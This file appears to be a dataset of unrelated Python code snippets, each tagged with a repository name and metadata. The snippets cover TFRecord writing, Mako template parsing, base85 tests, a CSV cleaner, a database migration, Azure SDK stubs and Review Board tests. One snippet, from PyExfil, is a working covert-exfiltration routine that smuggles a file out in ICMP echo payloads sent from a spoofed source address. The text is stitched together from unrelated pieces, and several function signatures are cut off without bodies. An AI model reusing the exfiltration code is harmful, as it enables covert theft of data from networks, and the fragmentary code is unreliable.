  fn_root = FLAGS.fn_root
  num_examples = len(img_fn_list)

  file_out = "%s.tfrecords" % FLAGS.file_out
  writer = tf.python_io.TFRecordWriter(file_out)

  for example_idx, img_fn in enumerate(img_fn_list):
    if example_idx % 1000 == 0:
      # Fix: the original Python-2 `print a, "/", b` statement prints a
      # tuple under Python 3; a single formatted argument works on both.
      print("%d / %d" % (example_idx, num_examples))
    image_raw = scipy.ndimage.imread(os.path.join(fn_root, img_fn))
    rows = image_raw.shape[0]
    cols = image_raw.shape[1]
    depth = image_raw.shape[2]
    image_raw = image_raw.tostring()
    example = tf.train.Example(
        features=tf.train.Features(
            feature={
                "height": _int64_feature(rows),
                "width": _int64_feature(cols),
                "depth": _int64_feature(depth),
                "image_raw": _bytes_feature(image_raw)
            }
        )
    )
    writer.write(example.SerializeToString())
  writer.close()
unnikrishnankgs/va
[ 1, 5, 1, 10, 1496432585 ]
def __init__(self, code, **exception_kwargs): self.code = code # represents all identifiers which are assigned to at some point in # the code self.declared_identifiers = set() # represents all identifiers which are referenced before their # assignment, if any self.undeclared_identifiers = set() # note that an identifier can be in both the undeclared and declared # lists. # using AST to parse instead of using code.co_varnames, # code.co_names has several advantages: # - we can locate an identifier as "undeclared" even if # its declared later in the same block of code # - AST is less likely to break with version changes # (for example, the behavior of co_names changed a little bit # in python version 2.5) if isinstance(code, compat.string_types): expr = pyparser.parse(code.lstrip(), "exec", **exception_kwargs) else: expr = code f = pyparser.FindIdentifiers(self, **exception_kwargs) f.visit(expr)
nwjs/chromium.src
[ 136, 133, 136, 45, 1453904223 ]
def __init__(self, code, **exception_kwargs):
    """Parse *code* as a tuple expression and collect its parts.

    :param code: source string or an already-parsed AST node
    :param exception_kwargs: context forwarded to parse errors
    """
    self.codeargs = []
    self.args = []
    self.declared_identifiers = set()
    self.undeclared_identifiers = set()
    if isinstance(code, compat.string_types):
        if re.match(r"\S", code) and not re.match(r",\s*$", code):
            # if theres text and no trailing comma, insure its parsed
            # as a tuple by adding a trailing comma
            code += ","
        expr = pyparser.parse(code, "exec", **exception_kwargs)
    else:
        expr = code

    f = pyparser.FindTuple(self, PythonCode, **exception_kwargs)
    f.visit(expr)
nwjs/chromium.src
[ 136, 133, 136, 45, 1453904223 ]
def __init__(self, code, **exception_kwargs):
    """Wrap a partial control-flow statement so it parses standalone.

    The fragment (e.g. ``for x in y:``) is padded with ``pass`` bodies
    and, for dangling clauses like ``else``/``except``, a synthetic
    opening statement, so the base class can parse it.

    :param code: the control-statement fragment
    :raises exceptions.CompileException: if *code* is not a recognized
        partial control statement
    """
    m = re.match(r"^(\w+)(?:\s+(.*?))?:\s*(#|$)", code.strip(), re.S)
    if not m:
        raise exceptions.CompileException(
            "Fragment '%s' is not a partial control statement" % code,
            **exception_kwargs
        )
    if m.group(3):
        # Strip a trailing comment after the colon.
        code = code[: m.start(3)]
    (keyword, expr) = m.group(1, 2)
    if keyword in ["for", "if", "while"]:
        code = code + "pass"
    elif keyword == "try":
        code = code + "pass\nexcept:pass"
    elif keyword == "elif" or keyword == "else":
        code = "if False:pass\n" + code + "pass"
    elif keyword == "except":
        code = "try:pass\n" + code + "pass"
    elif keyword == "with":
        code = code + "pass"
    else:
        raise exceptions.CompileException(
            "Unsupported control keyword: '%s'" % keyword,
            **exception_kwargs
        )
    super(PythonFragment, self).__init__(code, **exception_kwargs)
nwjs/chromium.src
[ 136, 133, 136, 45, 1453904223 ]
def __init__(self, code, allow_kwargs=True, **exception_kwargs):
    """Parse *code* as a function declaration and record its signature.

    :param code: the function declaration source
    :param allow_kwargs: when False, a ``**kwargs`` parameter raises
    :raises exceptions.CompileException: if *code* is not a function
        declaration, or it uses ``**kwargs`` when disallowed
    """
    self.code = code
    expr = pyparser.parse(code, "exec", **exception_kwargs)

    f = pyparser.ParseFunc(self, **exception_kwargs)
    f.visit(expr)
    if not hasattr(self, "funcname"):
        raise exceptions.CompileException(
            "Code '%s' is not a function declaration" % code,
            **exception_kwargs
        )
    if not allow_kwargs and self.kwargs:
        raise exceptions.CompileException(
            "'**%s' keyword argument not allowed here" %
            self.kwargnames[-1],
            **exception_kwargs
        )
nwjs/chromium.src
[ 136, 133, 136, 45, 1453904223 ]
def allargnames(self):
    """Return positional and keyword argument names as one tuple."""
    names = list(self.argnames)
    names.extend(self.kwargnames)
    return tuple(names)
nwjs/chromium.src
[ 136, 133, 136, 45, 1453904223 ]
def setup(self):
    """setup the test

    No fixtures required for these tests.
    """
    pass
eoyilmaz/anima
[ 119, 27, 119, 3, 1392807749 ]
def test_arnold_b85_encode_packs_zeros_properly(self):
    """testing if arnold_b85_encode is packing zeros properly
    """
    raw_data = [
        struct.pack('f', 0.0),
        struct.pack('ffff', 0.0, 0.0, 3.484236717224121, 0.0)
    ]
    encoded_data = [
        'z',
        'zz8^RH(z'
    ]
    # Idiom fix: iterate the pairs directly with zip instead of
    # indexing through range(len(...)).
    for raw, encoded in zip(raw_data, encoded_data):
        self.assertEqual(encoded, base85.arnold_b85_encode(raw))
eoyilmaz/anima
[ 119, 27, 119, 3, 1392807749 ]
def test_arnold_b85_decode_is_working_properly(self):
    """testing if arnold_b85_decode is working properly
    """
    raw_data = [
        struct.pack('f', 2),
        struct.pack('f', 3.484236717224121),
    ]
    encoded_data = [
        '8TFfd',
        '8^RH(',
    ]
    # Idiom fix: iterate the pairs directly with zip instead of
    # indexing through range(len(...)).
    for raw, encoded in zip(raw_data, encoded_data):
        self.assertEqual(raw, base85.arnold_b85_decode(encoded))
eoyilmaz/anima
[ 119, 27, 119, 3, 1392807749 ]
def test_arnold_b85_decode_unpacks_ones_properly(self):
    """testing if arnold_b85_decode is unpacking ones properly
    """
    raw_data = [
        struct.pack('f', 1.0),
        struct.pack('ffff', 1.0, 1.0, 3.484236717224121, 1.0)
    ]
    encoded_data = [
        'y',
        'yy8^RH(y'
    ]
    # Idiom fix: iterate the pairs directly with zip instead of
    # indexing through range(len(...)).
    for raw, encoded in zip(raw_data, encoded_data):
        self.assertEqual(raw, base85.arnold_b85_decode(encoded))
eoyilmaz/anima
[ 119, 27, 119, 3, 1392807749 ]
def send_file(ip_addr, src_ip_addr="127.0.0.1", file_path="", max_packetsize=512, SLEEP=0.1):
    """
    send_file will send a file to the ip_addr given. A file path is required
    to send the file. Max packet size can be determined automatically.

    The file is base64-encoded, split into ``max_packetsize`` chunks and
    carried in the payload of spoofed ICMP echo packets: one INIT packet
    announcing name/CRC/chunk count, the data chunks, then an END packet.

    :param ip_addr: IP Address to send the file to.
    :param src_ip_addr: IP Address to spoof from. Default it 127.0.0.1.
    :param file_path: Path of the file to send.
    :param max_packetsize: Max packet size. Default is 512.
    :param SLEEP: Delay in seconds between packets.
    :return: 0 on success, -1 if no file path was given.
    """
    if file_path == "":
        sys.stderr.write("No file path given.\n")
        return -1

    # Load file
    fh = open(file_path, READ_BINARY)
    iAmFile = fh.read()
    fh.close()

    # Create Raw Socket (IP_HDRINCL: we build the IP header ourselves;
    # requires elevated privileges).
    s = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP)
    s.setsockopt(IPPROTO_IP, IP_HDRINCL, 1)

    # Create IP Packet
    ip = ImpactPacket.IP()
    ip.set_ip_src(src_ip_addr)
    ip.set_ip_dst(ip_addr)

    # ICMP on top of IP
    icmp = ImpactPacket.ICMP()
    icmp.set_icmp_type(icmp.ICMP_ECHO)
    seq_id = 0

    # Calculate File:
    IamDone = base64.b64encode(iAmFile)  # Base64 Encode for ASCII
    checksum = zlib.crc32(IamDone)  # Build CRC for the file

    # Fragmentation of DATA.
    # BUGFIX: floor division. Plain '/' returns a float under Python 3,
    # which breaks range(1, x + 2) and the slice arithmetic below.
    x = len(IamDone) // max_packetsize
    y = len(IamDone) % max_packetsize

    # Get file name from file path:
    head, tail = os.path.split(file_path)

    # Build stream initiation packet: name, CRC and total chunk count.
    current_packet = ""
    current_packet += tail + DATA_SEPARATOR + str(checksum) + DATA_SEPARATOR + str(x + 2) + DATA_TERMINATOR + INIT_PACKET
    icmp.contains(ImpactPacket.Data(current_packet))
    ip.contains(icmp)
    icmp.set_icmp_id(seq_id)
    icmp.set_icmp_cksum(0)
    icmp.auto_checksum = 1
    s.sendto(ip.get_packet(), (ip_addr, 0))
    time.sleep(SLEEP)
    seq_id += 1

    # Iterate over the file, one max_packetsize chunk per ICMP packet.
    for i in range(1, x + 2):
        str_send = IamDone[max_packetsize * (i - 1): max_packetsize * i] + DATA_TERMINATOR
        icmp.contains(ImpactPacket.Data(str_send))
        ip.contains(icmp)
        icmp.set_icmp_id(seq_id)
        icmp.set_icmp_cksum(0)
        icmp.auto_checksum = 1
        s.sendto(ip.get_packet(), (ip_addr, 0))
        time.sleep(SLEEP)
        seq_id += 1

    # Add last section. NOTE(review): after the loop, i == x + 1, so this
    # slice starts past the end of the data and the chunk is empty; it
    # appears to exist to keep the announced count of x + 2 consistent —
    # confirm against the receiver.
    str_send = IamDone[max_packetsize * i:max_packetsize * i + y] + DATA_TERMINATOR
    icmp.contains(ImpactPacket.Data(str_send))
    ip.contains(icmp)
    seq_id += 1
    icmp.set_icmp_id(seq_id)
    icmp.set_icmp_cksum(0)
    icmp.auto_checksum = 1
    s.sendto(ip.get_packet(), (ip_addr, 0))
    time.sleep(SLEEP)

    # Send termination package
    str_send = (tail + DATA_SEPARATOR + str(checksum) + DATA_SEPARATOR + str(seq_id) + DATA_TERMINATOR + END_PACKET)
    icmp.contains(ImpactPacket.Data(str_send))
    ip.contains(icmp)
    seq_id += 1
    icmp.set_icmp_id(seq_id)
    icmp.set_icmp_cksum(0)
    icmp.auto_checksum = 1
    s.sendto(ip.get_packet(), (ip_addr, 0))
    return 0
ytisf/PyExfil
[ 668, 140, 668, 1, 1417115184 ]
def main():
    """Strip the header row from every CSV file in the current directory.

    Each ``*.csv`` file is rewritten, minus its first row, into a
    ``headerRemoved`` subdirectory; the originals are left untouched.
    """
    import csv, os
    os.makedirs('headerRemoved', exist_ok=True)

    # Loop through every file in the current working directory.
    for csvFilename in os.listdir('.'):
        if not csvFilename.endswith(".csv"):
            continue   # skip non-csv files
        print("Removing header from " + csvFilename + "...")

        # Read the CSV file in (skipping first row). newline='' is the
        # csv module's documented open mode — without it, newline
        # translation can corrupt embedded newlines in quoted fields.
        csvRows = []
        with open(csvFilename, newline='') as csvFileObj:
            readerObj = csv.reader(csvFileObj)
            for row in readerObj:
                if readerObj.line_num == 1:
                    continue   # skip first row
                csvRows.append(row)

        # Write out the CSV file; the with-block guarantees the handle is
        # closed (and flushed) even if a write fails.
        with open(os.path.join('headerRemoved', csvFilename), 'w',
                  newline='') as csvFileObj:
            csvWriter = csv.writer(csvFileObj)
            for row in csvRows:
                csvWriter.writerow(row)
JoseALermaIII/python-tutorials
[ 2, 3, 2, 10, 1475898535 ]
def upgrade():
    """Create ``service_callback_api`` and its versioned history table.

    The history table keys on (id, version), so every revision of a
    callback configuration is retained; the live table's unique index on
    ``service_id`` allows at most one callback API row per service.
    """
    op.create_table('service_callback_api_history',
    sa.Column('id', postgresql.UUID(as_uuid=True), nullable=False),
    sa.Column('service_id', postgresql.UUID(as_uuid=True), nullable=False),
    sa.Column('url', sa.String(), nullable=False),
    sa.Column('bearer_token', sa.String(), nullable=False),
    sa.Column('created_at', sa.DateTime(), nullable=False),
    sa.Column('updated_at', sa.DateTime(), nullable=True),
    sa.Column('updated_by_id', postgresql.UUID(as_uuid=True), nullable=False),
    # autoincrement=False: version values are set explicitly, not
    # generated by the database.
    sa.Column('version', sa.Integer(), autoincrement=False, nullable=False),
    sa.PrimaryKeyConstraint('id', 'version')
    )
    op.create_index(op.f('ix_service_callback_api_history_service_id'), 'service_callback_api_history', ['service_id'], unique=False)
    op.create_index(op.f('ix_service_callback_api_history_updated_by_id'), 'service_callback_api_history', ['updated_by_id'], unique=False)
    op.create_table('service_callback_api',
    sa.Column('id', postgresql.UUID(as_uuid=True), nullable=False),
    sa.Column('service_id', postgresql.UUID(as_uuid=True), nullable=False),
    sa.Column('url', sa.String(), nullable=False),
    sa.Column('bearer_token', sa.String(), nullable=False),
    sa.Column('created_at', sa.DateTime(), nullable=False),
    sa.Column('updated_at', sa.DateTime(), nullable=True),
    sa.Column('updated_by_id', postgresql.UUID(as_uuid=True), nullable=False),
    sa.Column('version', sa.Integer(), nullable=False),
    sa.ForeignKeyConstraint(['service_id'], ['services.id'], ),
    sa.ForeignKeyConstraint(['updated_by_id'], ['users.id'], ),
    sa.PrimaryKeyConstraint('id')
    )
    # unique=True enforces a single callback API per service.
    op.create_index(op.f('ix_service_callback_api_service_id'), 'service_callback_api', ['service_id'], unique=True)
    op.create_index(op.f('ix_service_callback_api_updated_by_id'), 'service_callback_api', ['updated_by_id'], unique=False)
alphagov/notifications-api
[ 56, 23, 56, 6, 1447855037 ]
def __init__(self, client, config, serializer, deserializer) -> None:
    """Store the pipeline client, configuration and (de)serializers."""
    self._client = client
    self._config = config
    self._serialize = serializer
    self._deserialize = deserializer
Azure/azure-sdk-for-python
[ 3526, 2256, 3526, 986, 1335285972 ]
def list_by_subscription_id( self, **kwargs: Any
Azure/azure-sdk-for-python
[ 3526, 2256, 3526, 986, 1335285972 ]
def prepare_request(next_link=None):
    # Headers are identical for the first page and for follow-up pages.
    header_parameters = {}  # type: Dict[str, Any]
    header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')

    if next_link:
        # Subsequent pages: the service hands back a fully-formed URL,
        # so no extra query parameters are added.
        url = next_link
        query_parameters = {}  # type: Dict[str, Any]
    else:
        # First page: build the URL from the operation metadata.
        url = self.list_by_subscription_id.metadata['url']  # type: ignore
        path_format_arguments = {
            'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str', min_length=1),
        }
        url = self._client.format_url(url, **path_format_arguments)
        query_parameters = {}  # type: Dict[str, Any]
        query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')

    return self._client.get(url, query_parameters, header_parameters)
Azure/azure-sdk-for-python
[ 3526, 2256, 3526, 986, 1335285972 ]
def list_by_resource_group( self, resource_group_name: str, **kwargs: Any
Azure/azure-sdk-for-python
[ 3526, 2256, 3526, 986, 1335285972 ]
def prepare_request(next_link=None):
    # Headers are identical for the first page and for follow-up pages.
    header_parameters = {}  # type: Dict[str, Any]
    header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')

    if next_link:
        # Subsequent pages: the service hands back a fully-formed URL,
        # so no extra query parameters are added.
        url = next_link
        query_parameters = {}  # type: Dict[str, Any]
    else:
        # First page: build the URL from the operation metadata.
        url = self.list_by_resource_group.metadata['url']  # type: ignore
        path_format_arguments = {
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str', min_length=1),
        }
        url = self._client.format_url(url, **path_format_arguments)
        query_parameters = {}  # type: Dict[str, Any]
        query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')

    return self._client.get(url, query_parameters, header_parameters)
Azure/azure-sdk-for-python
[ 3526, 2256, 3526, 986, 1335285972 ]
def setUp(self):
    """Create a repository, diffset, and FileDiff fixture for each test."""
    super(FileDiffTests, self).setUp()

    # Minimal git-style diff: one line of README replaced by two
    # (hunk header "@@ -2 +2,2 @@").
    diff = (
        b'diff --git a/README b/README\n'
        b'index 3d2b777..48272a3 100644\n'
        b'--- README\n'
        b'+++ README\n'
        b'@@ -2 +2,2 @@\n'
        b'-blah blah\n'
        b'+blah!\n'
        b'+blah!!\n'
    )

    self.repository = self.create_repository(tool_name='Test')
    self.diffset = DiffSet.objects.create(name='test',
                                          revision=1,
                                          repository=self.repository)
    # parent_diff64 is deliberately empty: these tests exercise a plain
    # diff with no parent diff attached.
    self.filediff = FileDiff(source_file='README',
                             dest_file='README',
                             diffset=self.diffset,
                             diff64=diff,
                             parent_diff64=b'')
reviewboard/reviewboard
[ 1464, 419, 1464, 1, 1250977189 ]
def test_set_line_counts(self):
    """Testing FileDiff.set_line_counts"""
    expected = {
        'raw_insert_count': 1,
        'raw_delete_count': 2,
        'insert_count': 3,
        'delete_count': 4,
        'replace_count': 5,
        'equal_count': 6,
        'total_line_count': 7,
    }

    self.filediff.set_line_counts(**expected)

    counts = self.filediff.get_line_counts()

    for key, value in expected.items():
        self.assertEqual(counts[key], value)

    # The raw counts are also persisted on the shared diff hash entry.
    diff_hash = self.filediff.diff_hash
    self.assertEqual(diff_hash.insert_count, 1)
    self.assertEqual(diff_hash.delete_count, 2)
reviewboard/reviewboard
[ 1464, 419, 1464, 1, 1250977189 ]
def test_diff_hashes(self):
    """Testing FileDiff with multiple entries and same diff data
    deduplicates data
    """
    diff_payload = (
        b'diff -rcN orig_src/foo.c new_src/foo.c\n'
        b'*** orig_src/foo.c\t2007-01-24 02:11:31.000000000 -0800\n'
        b'--- new_src/foo.c\t2007-01-24 02:14:42.000000000 -0800\n'
        b'***************\n'
        b'*** 1,5 ****\n'
        b' int\n'
        b' main()\n'
        b' {\n'
        b'! \tprintf("foo\n");\n'
        b' }\n'
        b'--- 1,8 ----\n'
        b'+ #include <stdio.h>\n'
        b'+ \n'
        b' int\n'
        b' main()\n'
        b' {\n'
        b'! \tprintf("foo bar\n");\n'
        b'! \treturn 0;\n'
        b' }\n')

    # Two FileDiffs created from byte-identical diff data...
    filediff1, filediff2 = (
        FileDiff.objects.create(diff=diff_payload, diffset=self.diffset)
        for _ in range(2)
    )

    # ...must end up pointing at one shared diff hash entry.
    self.assertEqual(filediff1.diff_hash, filediff2.diff_hash)
reviewboard/reviewboard
[ 1464, 419, 1464, 1, 1250977189 ]
def test_get_base_filediff_without_commit(self):
    """Testing FileDiff.get_base_filediff without associated commit"""
    fdiff = self.create_filediff(self.diffset)

    result = fdiff.get_base_filediff(base_commit=None)

    self.assertIsNone(result)
reviewboard/reviewboard
[ 1464, 419, 1464, 1, 1250977189 ]
def test_is_symlink_with_false(self):
    """Testing FileDiff.is_symlink with False"""
    fdiff = self.create_filediff(self.diffset)

    # Start from True so the assignment below provably flips the state.
    fdiff.extra_data['is_symlink'] = True
    fdiff.is_symlink = False

    # Explicitly test against the booleans, to avoid truthiness tests.
    self.assertIs(fdiff.is_symlink, False)
    self.assertIs(fdiff.extra_data.get('is_symlink'), False)
reviewboard/reviewboard
[ 1464, 419, 1464, 1, 1250977189 ]
def test_new_symlink_target(self):
    """Testing FileDiff.new_symlink_target"""
    target = 'new/path'
    fdiff = self.create_filediff(self.diffset)

    fdiff.new_symlink_target = target

    # The property and its extra_data backing store must agree.
    self.assertEqual(fdiff.new_symlink_target, target)
    self.assertEqual(fdiff.extra_data.get('new_symlink_target'), target)
reviewboard/reviewboard
[ 1464, 419, 1464, 1, 1250977189 ]
def test_new_unix_mode(self):
    """Testing FileDiff.new_unix_mode"""
    mode = '0100750'
    fdiff = self.create_filediff(self.diffset)

    fdiff.new_unix_mode = mode

    # The property and its extra_data backing store must agree.
    self.assertEqual(fdiff.new_unix_mode, mode)
    self.assertEqual(fdiff.extra_data.get('new_unix_mode'), mode)
reviewboard/reviewboard
[ 1464, 419, 1464, 1, 1250977189 ]
def setUp(self):
    """Build the shared FileDiff ancestry fixtures for each test."""
    super(FileDiffAncestorTests, self).setUp()
    self.set_up_filediffs()
reviewboard/reviewboard
[ 1464, 419, 1464, 1, 1250977189 ]
def test_get_ancestors_full(self):
    """Testing FileDiff.get_ancestors with minimal=False"""
    # Populating the ancestors is expected to cost exactly one query
    # per FileDiff.
    with self.assertNumQueries(len(self.filediffs)):
        ancestors = {
            fdiff: fdiff.get_ancestors(minimal=False,
                                       filediffs=self.filediffs)
            for fdiff in self.filediffs
        }

    self._check_ancestors(ancestors, minimal=False)
reviewboard/reviewboard
[ 1464, 419, 1464, 1, 1250977189 ]
def test_get_ancestors_no_update(self):
    """Testing FileDiff.get_ancestors without caching"""
    ancestors = {}

    for fdiff in self.filediffs:
        # With update=False, no database queries may be issued.
        with self.assertNumQueries(0):
            ancestors[fdiff] = fdiff.get_ancestors(
                minimal=True,
                filediffs=self.filediffs,
                update=False)

    self._check_ancestors(ancestors, minimal=True)
reviewboard/reviewboard
[ 1464, 419, 1464, 1, 1250977189 ]
def test_get_ancestors_cached_no_filediffs(self):
    """Testing FileDiff.get_ancestors with cached results when no
    FileDiffs are provided
    """
    # Prime the per-FileDiff ancestor cache first.
    for fdiff in self.filediffs:
        fdiff.get_ancestors(minimal=True, filediffs=self.filediffs)

    # With warm caches, the whole sweep should need exactly 5 queries.
    with self.assertNumQueries(5):
        ancestors = {
            fdiff: fdiff.get_ancestors(minimal=True)
            for fdiff in self.filediffs
        }

    self._check_ancestors(ancestors, minimal=True)
reviewboard/reviewboard
[ 1464, 419, 1464, 1, 1250977189 ]
def build_list_request( subscription_id: str, resource_group_name: str, account_name: str, **kwargs: Any
Azure/azure-sdk-for-python
[ 3526, 2256, 3526, 986, 1335285972 ]
def build_get_request( subscription_id: str, resource_group_name: str, account_name: str, backup_policy_name: str, **kwargs: Any
Azure/azure-sdk-for-python
[ 3526, 2256, 3526, 986, 1335285972 ]
def build_create_request_initial( subscription_id: str, resource_group_name: str, account_name: str, backup_policy_name: str, *, json: JSONType = None, content: Any = None, **kwargs: Any
Azure/azure-sdk-for-python
[ 3526, 2256, 3526, 986, 1335285972 ]
def build_update_request_initial( subscription_id: str, resource_group_name: str, account_name: str, backup_policy_name: str, *, json: JSONType = None, content: Any = None, **kwargs: Any
Azure/azure-sdk-for-python
[ 3526, 2256, 3526, 986, 1335285972 ]
def build_delete_request_initial( subscription_id: str, resource_group_name: str, account_name: str, backup_policy_name: str, **kwargs: Any
Azure/azure-sdk-for-python
[ 3526, 2256, 3526, 986, 1335285972 ]
def __init__(self, client, config, serializer, deserializer):
    """Store the pipeline client, configuration and (de)serializers."""
    self._client = client
    self._config = config
    self._serialize = serializer
    self._deserialize = deserializer
Azure/azure-sdk-for-python
[ 3526, 2256, 3526, 986, 1335285972 ]
def list( self, resource_group_name: str, account_name: str, **kwargs: Any
Azure/azure-sdk-for-python
[ 3526, 2256, 3526, 986, 1335285972 ]